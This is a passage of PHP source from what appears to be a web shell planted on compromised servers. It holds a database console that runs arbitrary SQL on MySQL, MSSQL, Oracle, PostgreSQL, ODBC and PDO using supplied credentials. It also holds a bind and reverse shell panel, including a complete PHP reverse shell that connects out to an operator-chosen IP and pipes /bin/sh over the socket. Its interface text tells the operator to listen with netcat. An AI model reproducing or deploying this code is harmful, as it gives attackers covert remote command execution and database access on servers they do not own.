$sqlhost = $sqlhost1 = ss($_REQUEST['sqlhost1']);
}
if (isset($_REQUEST['mssqlcon']) && isset($_REQUEST['sqlhost2'])) {
$sqlhost = $sqlhost2 = ss($_REQUEST['sqlhost2']);
}
if (isset($_REQUEST['pgsqlcon']) && isset($_REQUEST['sqlhost3'])) {
$sqlhost = $sqlhost3 = ss($_REQUEST['sqlhost3']);
}
if (isset($_REQUEST['oraclecon']) && isset($_REQUEST['sqlhost4'])) {
$sqlhost = $sqlhost4 = ss($_REQUEST['sqlhost4']);
}
if (isset($_REQUEST['odbccon']) && isset($_REQUEST['odbcdsn'])) {
$odbcdsn = ss($_REQUEST['odbcdsn']);
}
if (isset($_REQUEST['pdocon']) && isset($_REQUEST['pdodsn'])) {
$pdodsn = ss($_REQUEST['pdodsn']);
}
if (isset($_REQUEST['sqlhost'])) {
$sqlhost = ss($_REQUEST['sqlhost']);
}
if (isset($_REQUEST['mysqlcon']) && isset($_REQUEST['sqluser1'])) {
$sqluser = $sqluser1 = ss($_REQUEST['sqluser1']);
}
if (isset($_REQUEST['mssqlcon']) && isset($_REQUEST['sqluser2'])) {
$sqluser = $sqluser2 = ss($_REQUEST['sqluser2']);
}
if (isset($_REQUEST['pgsqlcon']) && isset($_REQUEST['sqluser3'])) {
$sqluser = $sqluser3 = ss($_REQUEST['sqluser3']);
}
if (isset($_REQUEST['oraclecon']) && isset($_REQUEST['sqluser4'])) {
$sqluser = $sqluser4 = ss($_REQUEST['sqluser4']);
}
if (isset($_REQUEST['odbccon']) && isset($_REQUEST['odbcuser'])) {
$odbcuser = ss($_REQUEST['odbcuser']);
}
if (isset($_REQUEST['pdocon']) && isset($_REQUEST['pdouser'])) {
$pdouser = ss($_REQUEST['pdouser']);
}
if (isset($_REQUEST['sqluser'])) {
$sqluser = ss($_REQUEST['sqluser']);
}
if (isset($_REQUEST['mysqlcon']) && isset($_REQUEST['sqlport1'])) {
$sqlport = $sqlport1 = ss($_REQUEST['sqlport1']);
}
if (isset($_REQUEST['mssqlcon']) && isset($_REQUEST['sqlport2'])) {
$sqlport = $sqlport2 = ss($_REQUEST['sqlport2']);
}
if (isset($_REQUEST['pgsqlcon']) && isset($_REQUEST['sqlport3'])) {
$sqlport = $sqlport3 = ss($_REQUEST['sqlport3']);
}
if (isset($_REQUEST['oraclecon']) && isset($_REQUEST['sqlport4'])) {
$sqlport = $sqlport4 = ss($_REQUEST['sqlport4']);
}
if (isset($_REQUEST['sqlport'])) {
$sqlport = ss($_REQUEST['sqlport']);
}
if (isset($_REQUEST['mysqlcon']) && isset($_REQUEST['sqlpass1'])) {
$sqlpass = $sqlpass1 = ss($_REQUEST['sqlpass1']);
}
if (isset($_REQUEST['mssqlcon']) && isset($_REQUEST['sqlpass2'])) {
$sqlpass = $sqlpass2 = ss($_REQUEST['sqlpass2']);
}
if (isset($_REQUEST['pgsqlcon']) && isset($_REQUEST['sqlpass3'])) {
$sqlpass = $sqlpass3 = ss($_REQUEST['sqlpass3']);
}
if (isset($_REQUEST['oraclecon']) && isset($_REQUEST['sqlpass4'])) {
$sqlpass = $sqlpass4 = ss($_REQUEST['sqlpass4']);
}
if (isset($_REQUEST['odbccon']) && isset($_REQUEST['odbcpass'])) {
$odbcpass = ss($_REQUEST['odbcpass']);
}
if (isset($_REQUEST['pdocon']) && isset($_REQUEST['pdopass'])) {
$pdopass = ss($_REQUEST['pdopass']);
}
if (isset($_REQUEST['sqlpass']) && isset($_REQUEST['sqlpass'])) {
$sqlpass = ss($_REQUEST['sqlpass']);
}
$sqls = "";
$q_result = "";
$hostandport = $sqlhost;
if (trim($sqlport) != "") {
$hostandport = $sqlhost . ":" . $sqlport;
}
if (isset($_REQUEST['mysqlcon']) && ($con = mysql_connect($hostandport, $sqluser, $sqlpass))) {
if (isset($_REQUEST['sqlcode'])) {
$sqls = ss($_REQUEST['sqlcode']);
$querys = explode(";", $sqls);
foreach ($querys as $query) {
if (trim($query) != "") {
$hasil = mysql_query($query);
if ($hasil) {
$q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">" . $query . "; \r\n <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>\r\n <table class=\"explore\" style=\"width:99%;\"><tr>";
for ($i = 0; $i < mysql_num_fields($hasil); $i++) {
$q_result .= "<th>" . htmlspecialchars(mysql_field_name($hasil, $i)) . "</th>";
}
$q_result .= "</tr>";
while ($rows = mysql_fetch_array($hasil)) {
$q_result .= "<tr>";
for ($j = 0; $j < mysql_num_fields($hasil); $j++) {
if ($rows[$j] == "") {
$dataz = " ";
} else {
$dataz = $rows[$j];
}
$q_result .= "<td>" . htmlspecialchars($dataz) . "</td>";
}
$q_result .= "</tr>";
}
$q_result .= "</table>";
} else {
$q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">" . $query . "; \r\n <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
}
}
}
} else {
$sqls = "SHOW databases;";
}
$s_result .= " <form action=\"?db\" method=\"post\">\r\n <input type=\"hidden\" name=\"sqlhost\" value=\"" . $sqlhost . "\" />\r\n <input type=\"hidden\" name=\"sqluser\" value=\"" . $sqluser . "\" />\r\n <input type=\"hidden\" name=\"sqlport\" value=\"" . $sqlport . "\" />\r\n <input type=\"hidden\" name=\"sqlpass\" value=\"" . $sqlpass . "\" />\r\n <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />\r\n <textarea id=\"sqlcode\" name=\"sqlcode\" class=\"evalcode\" style=\"height:10em;\">" . $sqls . "</textarea>\r\n <p><input type=\"submit\" name=\"mysqlcon\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;\" />\r\n Separate multiple commands with a semicolon <span class=\"gaya\">[</span> ; <span class=\"gaya\">]</span></p>\r\n </form>";
$s_result .= "<div>" . $q_result . "</div>";
if ($con) {
mysql_close($con);
}
} elseif (isset($_REQUEST['mssqlcon']) && ($con = mssql_connect($hostandport, $sqluser, $sqlpass))) {
if (isset($_REQUEST['sqlcode'])) {
$sqls = ss($_REQUEST['sqlcode']);
$querys = explode(";", $sqls);
foreach ($querys as $query) {
if (trim($query) != "") {
$hasil = mssql_query($query);
if ($hasil) {
$q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">" . $query . "; \r\n <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>\r\n <table class=\"explore\" style=\"width:99%;\"><tr>";
for ($i = 0; $i < mssql_num_fields($hasil); $i++) {
$q_result .= "<th>" . htmlspecialchars(mssql_field_name($hasil, $i)) . "</th>";
}
$q_result .= "</tr>";
while ($rows = mssql_fetch_array($hasil)) {
$q_result .= "<tr>";
for ($j = 0; $j < mssql_num_fields($hasil); $j++) {
if ($rows[$j] == "") {
$dataz = " ";
} else {
$dataz = $rows[$j];
}
$q_result .= "<td>" . htmlspecialchars($dataz) . "</td>";
}
$q_result .= "</tr>";
}
$q_result .= "</table>";
} else {
$q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">" . $query . "; \r\n <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
}
}
}
} else {
$sqls = "EXEC sp_databases;";
}
$s_result .= " <form action=\"?db\" method=\"post\">\r\n <input type=\"hidden\" name=\"sqlhost\" value=\"" . $sqlhost . "\" />\r\n <input type=\"hidden\" name=\"sqluser\" value=\"" . $sqluser . "\" />\r\n <input type=\"hidden\" name=\"sqlport\" value=\"" . $sqlport . "\" />\r\n <input type=\"hidden\" name=\"sqlpass\" value=\"" . $sqlpass . "\" />\r\n <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />\r\n <textarea id=\"sqlcode\" name=\"sqlcode\" class=\"evalcode\" style=\"height:10em;\">" . $sqls . "</textarea>\r\n <p><input type=\"submit\" name=\"mssqlcon\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;\" />\r\n Separate multiple commands with a semicolon <span class=\"gaya\">[</span> ; <span class=\"gaya\">]</span></p>\r\n </form>";
$s_result .= "<div>" . $q_result . "</div>";
if ($con) {
mssql_close($con);
}
} elseif (isset($_REQUEST['oraclecon']) && ($con = oci_connect($sqluser, $sqlpass, $hostandport))) {
if (isset($_REQUEST['sqlcode'])) {
$sqls = ss($_REQUEST['sqlcode']);
$querys = explode(";", $sqls);
foreach ($querys as $query) {
if (trim($query) != "") {
$st = oci_parse($con, $query);
if (oci_execute($st)) {
$q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">" . $query . "; \r\n <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>\r\n <table class=\"explore\" style=\"width:99%;\"><tr>";
for ($i = 1; $i <= oci_num_fields($st); $i++) {
$q_result .= "<th>" . htmlspecialchars(oci_field_name($st, $i)) . "</th>";
}
$q_result .= "</tr>";
while ($rows = oci_fetch_array($st)) {
$q_result .= "<tr>";
for ($j = 0; $j < oci_num_fields($st); $j++) {
if ($rows[$j] == "") {
$dataz = " ";
} else {
$dataz = $rows[$j];
}
$q_result .= "<td>" . htmlspecialchars($dataz) . "</td>";
}
$q_result .= "</tr>";
}
$q_result .= "</table>";
} else {
$q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">" . $query . "; \r\n <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
}
}
}
} else {
$sqls = "SELECT * FROM user_tablespaces;";
}
$s_result .= " <form action=\"?db\" method=\"post\">\r\n <input type=\"hidden\" name=\"sqlhost\" value=\"" . $sqlhost . "\" />\r\n <input type=\"hidden\" name=\"sqluser\" value=\"" . $sqluser . "\" />\r\n <input type=\"hidden\" name=\"sqlport\" value=\"" . $sqlport . "\" />\r\n <input type=\"hidden\" name=\"sqlpass\" value=\"" . $sqlpass . "\" />\r\n <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />\r\n <textarea id=\"sqlcode\" name=\"sqlcode\" class=\"evalcode\" style=\"height:10em;\">" . $sqls . "</textarea>\r\n <p><input type=\"submit\" name=\"oraclecon\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;\" />\r\n Separate multiple commands with a semicolon <span class=\"gaya\">[</span> ; <span class=\"gaya\">]</span></p>\r\n </form>";
$s_result .= "<div>" . $q_result . "</div>";
if ($con) {
oci_close($con);
}
} elseif (isset($_REQUEST['pgsqlcon']) && ($con = pg_connect("host={$sqlhost} user={$sqluser} password={$sqlpass} port={$sqlport}"))) {
if (isset($_REQUEST['sqlcode'])) {
$sqls = ss($_REQUEST['sqlcode']);
$querys = explode(";", $sqls);
foreach ($querys as $query) {
if (trim($query) != "") {
$hasil = pg_query($query);
if ($hasil) {
$q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">" . $query . "; \r\n <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>\r\n <table class=\"explore\" style=\"width:99%;\"><tr>";
for ($i = 0; $i < pg_num_fields($hasil); $i++) {
$q_result .= "<th>" . htmlspecialchars(pg_field_name($hasil, $i)) . "</th>";
}
$q_result .= "</tr>";
while ($rows = pg_fetch_array($hasil)) {
$q_result .= "<tr>";
for ($j = 0; $j < pg_num_fields($hasil); $j++) {
if ($rows[$j] == "") {
$dataz = " ";
} else {
$dataz = $rows[$j];
}
$q_result .= "<td>" . htmlspecialchars($dataz) . "</td>";
}
$q_result .= "</tr>";
}
$q_result .= "</table>";
} else {
$q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">" . $query . "; \r\n <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
}
}
}
}
} elseif (isset($_REQUEST['odbccon']) && ($con = odbc_connect($odbcdsn, $odbcuser, $odbcpass))) {
if (isset($_REQUEST['sqlcode'])) {
$sqls = ss($_REQUEST['sqlcode']);
$querys = explode(";", $sqls);
foreach ($querys as $query) {
if (trim($query) != "") {
$hasil = odbc_exec($con, $query);
if ($hasil) {
$q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">" . $query . "; \r\n <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>\r\n <table class=\"explore\" style=\"width:99%;\"><tr>";
for ($i = 1; $i <= odbc_num_fields($hasil); $i++) {
$q_result .= "<th>" . htmlspecialchars(odbc_field_name($hasil, $i)) . "</th>";
}
$q_result .= "</tr>";
while ($rows = odbc_fetch_array($hasil)) {
$q_result .= "<tr>";
foreach ($rows as $r) {
if ($r == "") {
$dataz = " ";
} else {
$dataz = $r;
}
$q_result .= "<td>" . htmlspecialchars($dataz) . "</td>";
}
$q_result .= "</tr>";
}
$q_result .= "</table>";
} else {
$q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">" . $query . "; \r\n <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
}
}
}
} else {
$sqls = "";
}
$s_result .= " <form action=\"?db\" method=\"post\">\r\n <input type=\"hidden\" name=\"odbcdsn\" value=\"" . $odbcdsn . "\" />\r\n <input type=\"hidden\" name=\"odbcuser\" value=\"" . $odbcuser . "\" />\r\n <input type=\"hidden\" name=\"odbcpass\" value=\"" . $odbcpass . "\" />\r\n <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />\r\n <textarea id=\"sqlcode\" name=\"sqlcode\" class=\"evalcode\" style=\"height:10em;\">" . $sqls . "</textarea>\r\n <p><input type=\"submit\" name=\"odbccon\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;\" />\r\n Separate multiple commands with a semicolon <span class=\"gaya\">[</span> ; <span class=\"gaya\">]</span></p>\r\n </form>";
$s_result .= "<div>" . $q_result . "</div>";
if ($con) {
odbc_close($con);
}
} else {
if (isset($_REQUEST['pdocon'])) {
try {
$mypdo = new PDO($pdodsn, $pdouser, $pdopass);
if (isset($_REQUEST['sqlcode'])) {
$sqls = ss($_REQUEST['sqlcode']);
$querys = explode(";", $sqls);
foreach ($querys as $query) {
if (trim($query) != "") {
if ($hasil = $mypdo->query($query)) {
$q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">" . $query . "; \r\n <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>\r\n <table class=\"explore\" style=\"width:99%;\"><tr>";
$r = $hasil->fetch(PDO::FETCH_ASSOC);
$savefirstrow = array();
foreach ($r as $fn => $fv) {
$q_result .= "<th>" . htmlspecialchars($fn) . "</th>";
$savefirstrow[] = $fv;
}
$q_result .= "</tr><tr>";
foreach ($savefirstrow as $fv) {
$q_result .= "<td>" . htmlspecialchars($fv) . "</td>";
}
$q_result .= "</tr>";
while ($rows = $hasil->fetch(PDO::FETCH_ASSOC)) {
$q_result .= "<tr>";
foreach ($rows as $r) {
if ($r == "") {
$dataz = " ";
} else {
$dataz = $r;
}
$q_result .= "<td>" . htmlspecialchars($dataz) . "</td>";
}
$q_result .= "</tr>";
}
$q_result .= "</table>";
} else {
$q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">" . $query . "; \r\n <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
}
$q_result .= "</table>";
}
}
} else {
$sqls = "";
}
$s_result .= " <form action=\"?db\" method=\"post\">\r\n <input type=\"hidden\" name=\"pdodsn\" value=\"" . $pdodsn . "\" />\r\n <input type=\"hidden\" name=\"pdouser\" value=\"" . $pdouser . "\" />\r\n <input type=\"hidden\" name=\"pdopass\" value=\"" . $pdopass . "\" />\r\n <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />\r\n <textarea id=\"sqlcode\" name=\"sqlcode\" class=\"evalcode\" style=\"height:10em;\">" . $sqls . "</textarea>\r\n <p><input type=\"submit\" name=\"pdocon\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;\" />\r\n Separate multiple commands with a semicolon <span class=\"gaya\">[</span> ; <span class=\"gaya\">]</span></p>\r\n </form>";
$s_result .= "<div>" . $q_result . "</div>";
} catch (PDOException $uck) {
}
} else {
$s_result .= "<div class=\"mybox\"><h2>connect to MySQL</h2>\r\n <form action=\"?db\" method=\"post\" />\r\n <table class=\"myboxtbl\">\r\n <tr><td style=\"width:120px;\">Host</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlhost1\" value=\"" . $sqlhost1 . "\" /></td></tr>\r\n <tr><td>Username</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqluser1\" value=\"" . $sqluser1 . "\" /></td></tr>\r\n <tr><td>Password</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"password\" name=\"sqlpass1\" value=\"\" /></td></tr>\r\n <tr><td>Port (optional)</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlport1\" value=\"" . $sqlport1 . "\" /></td></tr>\r\n </table>\r\n <input type=\"submit\" name=\"mysqlcon\" class=\"inputzbut\" value=\"Connect !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />\r\n </form>\r\n </div>";
$s_result .= "<div class=\"mybox\"><h2>connect to MsSQL</h2>\r\n <form action=\"?db\" method=\"post\" />\r\n <table class=\"myboxtbl\">\r\n <tr><td style=\"width:120px;\">Host</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlhost2\" value=\"" . $sqlhost2 . "\" /></td></tr>\r\n <tr><td>Username</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqluser2\" value=\"" . $sqluser2 . "\" /></td></tr>\r\n <tr><td>Password</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"password\" name=\"sqlpass2\" value=\"\" /></td></tr>\r\n <tr><td>Port (optional)</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlport2\" value=\"" . $sqlport2 . "\" /></td></tr>\r\n </table>\r\n <input type=\"submit\" name=\"mssqlcon\" class=\"inputzbut\" value=\"Connect !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />\r\n </form>\r\n </div>";
$s_result .= "<div class=\"mybox\"><h2>connect to PostgreSQL</h2>\r\n <form action=\"?db\" method=\"post\" />\r\n <table class=\"myboxtbl\">\r\n <tr><td style=\"width:120px;\">Host</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlhost3\" value=\"" . $sqlhost3 . "\" /></td></tr>\r\n <tr><td>Username</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqluser3\" value=\"" . $sqluser3 . "\" /></td></tr>\r\n <tr><td>Password</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"password\" name=\"sqlpass3\" value=\"\" /></td></tr>\r\n <tr><td>Port (optional)</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlport3\" value=\"" . $sqlport3 . "\" /></td></tr>\r\n </table>\r\n <input type=\"submit\" name=\"pgsqlcon\" class=\"inputzbut\" value=\"Connect !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />\r\n <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />\r\n </form>\r\n </div>";
$s_result .= "<div class=\"mybox\"><h2>connect to Oracle</h2>\r\n <form action=\"?db\" method=\"post\" />\r\n <table class=\"myboxtbl\">\r\n <tr><td style=\"width:120px;\">Host</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlhost4\" value=\"" . $sqlhost4 . "\" /></td></tr>\r\n <tr><td>Username</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqluser4\" value=\"" . $sqluser4 . "\" /></td></tr>\r\n <tr><td>Password</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"password\" name=\"sqlpass4\" value=\"\" /></td></tr>\r\n <tr><td>Port (optional)</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlport4\" value=\"" . $sqlport4 . "\" /></td></tr>\r\n </table>\r\n <input type=\"submit\" name=\"oraclecon\" class=\"inputzbut\" value=\"Connect !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />\r\n <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />\r\n </form>\r\n </div>";
$s_result .= "<div class=\"mybox\"><h2>connect using ODBC</h2>\r\n <form action=\"?db\" method=\"post\" />\r\n <table class=\"myboxtbl\">\r\n <tr><td style=\"width:120px;\">DSN / Connection String</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"odbcdsn\" value=\"" . $odbcdsn . "\" /></td></tr>\r\n <tr><td>Username</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"odbcuser\" value=\"" . $odbcuser . "\" /></td></tr>\r\n <tr><td>Password</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"password\" name=\"odbcpass\" value=\"\" /></td></tr>\r\n </table>\r\n <input type=\"submit\" name=\"odbccon\" class=\"inputzbut\" value=\"Connect !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />\r\n <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />\r\n </form>\r\n </div>";
$s_result .= "<div class=\"mybox\"><h2>connect using PDO</h2>\r\n <form action=\"?db\" method=\"post\" />\r\n <table class=\"myboxtbl\">\r\n <tr><td style=\"width:120px;\">DSN / Connection String</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"pdodsn\" value=\"" . $pdodsn . "\" /></td></tr>\r\n <tr><td>Username</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"pdouser\" value=\"" . $pdouser . "\" /></td></tr>\r\n <tr><td>Password</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"password\" name=\"pdopass\" value=\"\" /></td></tr>\r\n </table>\r\n <input type=\"submit\" name=\"pdocon\" class=\"inputzbut\" value=\"Connect !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />\r\n <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />\r\n </form>\r\n </div>";
}
}
} elseif (isset($_REQUEST['rs'])) {
$rshost = $s_server_ip;
$rstarget = "";
$d = $pwd;
if (isset($_REQUEST['d'])) {
$d = ss($_REQUEST['d']);
}
$rsport = "13123";
$rspesan = "Press ' Go ! ' button and run ' nc <i>server_ip</i> <i>port</i> ' on your computer";
$rspesanb = "Run ' nc -l -v -p <i>port</i> ' on your computer and press ' Go ! ' button";
$rsport1 = $rsport;
$rsport2 = $rsport;
$rsport3 = $rsport;
if (isset($_REQUEST['xbind_pl'])) {
if (isset($_REQUEST['sqlport1'])) {
$rsport1 = ss($_REQUEST['sqlport1']);
}
$rstarget = $rsport1;
$rsres = rs($s_win, cp($d), "xbind_pl", $xbind_pl, $rstarget);
$s_result .= $rsres;
}
if (isset($_REQUEST['xbind_py'])) {
if (isset($_REQUEST['sqlport2'])) {
$rsport2 = ss($_REQUEST['sqlport2']);
}
$rstarget = $rsport2;
$rsres = rs($s_win, cp($d), "xbind_py", $xmulti_py, $rstarget);
$s_result .= $rsres;
}
if (isset($_REQUEST['xbind_bin'])) {
if (isset($_REQUEST['sqlport3'])) {
$rsport3 = ss($_REQUEST['sqlport3']);
}
$rstarget = $rsport3;
if (!$s_win) {
$rsres = rs($s_win, cp($d), "xbind_bin", $xbind_c, $rstarget);
} else {
$rsres = rs($s_win, cp($d), "xbind_bin", $wmulti_c, $rstarget);
}
$s_result .= $rsres;
}
$rsportb1 = $rsport;
$rsportb2 = $rsport;
$rsportb3 = $rsport;
$rsportb4 = $rsport;
$rstarget1 = $s_my_ip;
$rstarget2 = $s_my_ip;
$rstarget3 = $s_my_ip;
$rstarget4 = $s_my_ip;
if (isset($_REQUEST['xback_pl'])) {
if (isset($_REQUEST['sqlportb1'])) {
$rsportb1 = ss($_REQUEST['sqlportb1']);
}
if (isset($_REQUEST['rstarget1'])) {
$rstarget1 = ss($_REQUEST['rstarget1']);
}
$rstarget = $rsportb1 . " " . $rstarget1;
$rsres = rs($s_win, cp($d), "xback_pl", $xback_pl, $rstarget);
$s_result .= $rsres;
}
if (isset($_REQUEST['xback_py'])) {
if (isset($_REQUEST['sqlportb2'])) {
$rsportb2 = ss($_REQUEST['sqlportb2']);
}
if (isset($_REQUEST['rstarget2'])) {
$rstarget2 = ss($_REQUEST['rstarget2']);
}
$rstarget = $rsportb2 . " " . $rstarget2;
$rsres = rs($s_win, cp($d), "xback_py", $xmulti_py, $rstarget);
$s_result .= $rsres;
}
if (isset($_REQUEST['xback_bin'])) {
if (isset($_REQUEST['sqlportb3'])) {
$rsportb3 = ss($_REQUEST['sqlportb3']);
}
if (isset($_REQUEST['rstarget3'])) {
$rstarget3 = ss($_REQUEST['rstarget3']);
}
$rstarget = $rsportb3 . " " . $rstarget3;
if (!$s_win) {
$rsres = rs($s_win, cp($d), "xback_bin", $xback_c, $rstarget);
} else {
$rsres = rs($s_win, cp($d), "xback_bin", $wmulti_c, $rstarget);
}
$s_result .= $rsres;
}
if (isset($_REQUEST['xback_php'])) {
if (isset($_REQUEST['sqlportb4'])) {
$rsportb4 = ss($_REQUEST['sqlportb4']);
}
if (isset($_REQUEST['rstarget4'])) {
$rstarget4 = ss($_REQUEST['rstarget4']);
}
$ip = $rstarget4;
$port = $rsportb4;
$chunk_size = 1337;
$write_a = null;
$error_a = null;
$shell = '/bin/sh';
$daemon = 0;
$debug = 0;
if (function_exists('pcntl_fork')) {
$pid = pcntl_fork();
if ($pid == -1) {
exit(1);
}
if ($pid) {
exit(0);
}
if (posix_setsid() == -1) {
exit(1);
}
$daemon = 1;
}
umask(0);
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
exit(1);
}
$descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
exit(1);
}
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
while (1) {
if (feof($sock)) {
break;
}
if (feof($pipes[1])) {
break;
}
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
if (in_array($sock, $read_a)) {
$input = fread($sock, $chunk_size);
fwrite($pipes[0], $input);
}
if (in_array($pipes[1], $read_a)) {
$input = fread($pipes[1], $chunk_size);
fwrite($sock, $input);
}
if (in_array($pipes[2], $read_a)) {
$input = fread($pipes[2], $chunk_size);
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
$rsres = " ";
$s_result .= $rsres;
}
$s_result .= "<div class=\"mybox\"><h2>Bind shell ( perl )</h2>\r\n <form action=\"?rs\" method=\"post\" />\r\n <table class=\"myboxtbl\">\r\n <tr><td style=\"width:100px;\">Server IP</td><td><input disabled=\"disabled\" style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"rshost1\" value=\"" . $rshost . "\" /></td></tr>\r\n <tr><td>Port</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlport1\" value=\"" . $rsport1 . "\" /></td></tr>\r\n </table>\r\n <input type=\"submit\" name=\"xbind_pl\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />\r\n <span id=\"rs1\">" . $rspesan . "</span>\r\n <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />\r\n </form>\r\n </div>";
$s_result .= "<div class=\"mybox\"><h2>Bind shell ( python )</h2>\r\n <form action=\"?rs\" method=\"post\" />\r\n <table class=\"myboxtbl\">\r\n <tr><td style=\"width:100px;\">Server IP</td><td><input disabled=\"disabled\" style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"rshost\" value=\"" . $rshost . "\" /></td></tr>\r\n <tr><td>Port</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlport2\" value=\"" . $rsport2 . "\" /></td></tr>\r\n </table>\r\n <input type=\"submit\" name=\"xbind_py\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />\r\n <span id=\"rs1\">" . $rspesan . "</span>\r\n <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />\r\n </form>\r\n </div>";
$s_result .= "<div class=\"mybox\"><h2>Bind shell ( bin )</h2>\r\n <form action=\"?rs\" method=\"post\" />\r\n <table class=\"myboxtbl\">\r\n <tr><td style=\"width:100px;\">Server IP</td><td><input disabled=\"disabled\" style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"rshost\" value=\"" . $rshost . "\" /></td></tr>\r\n <tr><td>Port</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlport3\" value=\"" . $rsport3 . "\" /></td></tr>\r\n </table>\r\n <input type=\"submit\" name=\"xbind_bin\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />\r\n <span id=\"rs1\">" . $rspesan . "</span>\r\n <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />\r\n </form>\r\n </div>";
$s_result .= "<div class=\"mybox\"><h2>Reverse shell ( perl )</h2>\r\n <form action=\"?rs\" method=\"post\" />\r\n <table class=\"myboxtbl\">\r\n <tr><td style=\"width:100px;\">Your IP</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"rstarget1\" value=\"" . $rstarget1 . "\" /></td></tr>\r\n <tr><td>Port</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlportb1\" value=\"" . $rsportb1 . "\" /></td></tr>\r\n </table>\r\n <input type=\"submit\" name=\"xback_pl\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />\r\n <span id=\"rs1\">" . $rspesanb . "</span>\r\n <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />\r\n </form>\r\n </div>";
